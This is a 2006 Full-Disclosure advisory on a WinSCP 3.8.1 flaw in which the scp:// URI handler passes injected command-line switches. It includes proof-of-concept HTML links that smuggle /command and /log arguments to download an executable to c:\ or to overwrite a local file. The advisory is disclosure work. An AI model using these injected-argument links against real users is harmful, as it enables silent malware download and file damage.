[Full-disclosure] WinSCP - URI Handler Command Switch Parsing

2006-06-11T00:00:00
ID SECURITYVULNS:DOC:13097
Type securityvulns
Reporter Securityvulns
Modified 2006-06-11T00:00:00

Description

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be affected

Description :

During a typical installation of winscp several URI handlers are installed. (scp:// sftp://) It is possible to include additional command line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a specified file to an arbitrary ftp. or they may download executables to a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a c:\ (asuming the host is in the cache otherwise user interaction is required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile% 22"log</a>

would append log output to c:\somefile possibly rendering the file unusable in the process. Note that this also works when the host is not in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a solution"


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/